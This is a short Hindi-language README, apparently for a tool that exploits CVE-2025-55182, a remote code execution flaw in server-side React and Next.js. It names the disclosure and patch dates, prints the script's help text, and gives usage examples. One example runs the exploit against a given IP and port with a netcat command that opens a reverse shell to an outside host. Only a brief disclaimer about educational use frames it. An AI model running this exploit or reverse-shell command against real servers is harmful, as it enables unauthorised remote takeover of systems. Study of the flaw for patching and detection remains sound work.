
CVE-2025-55182 एक्सप्लॉइट | infrar3d द्वारा
infrar3d द्वारा xpl0ited
रिएक्ट.जेएस (React.js) के सर्वर-साइड उपयोग को प्रभावित करने वाली 10.0 गंभीरता स्तर की एक भेद्यता, जिसे React.js में CVE-2025-55182 और विशेष रूप से Next.js फ्रेमवर्क के लिए CVE-2025-66478 के रूप में ट्रैक किया जाता है।
यह भेद्यता 29 नवंबर 2025 PT को Meta टीम को Lachlan Davidson द्वारा जिम्मेदारीपूर्वक प्रकट की गई थी। प्रारंभिक प्रकटीकरण और पैच रिलीज़ 3 दिसंबर 2025 PT को React और Vercel द्वारा किया गया। (मूल: https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
यह सॉफ्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है।
सभी लागू कानूनों का पालन करना आपकी जिम्मेदारी है। नैतिक और जिम्मेदारीपूर्वक उपयोग करें।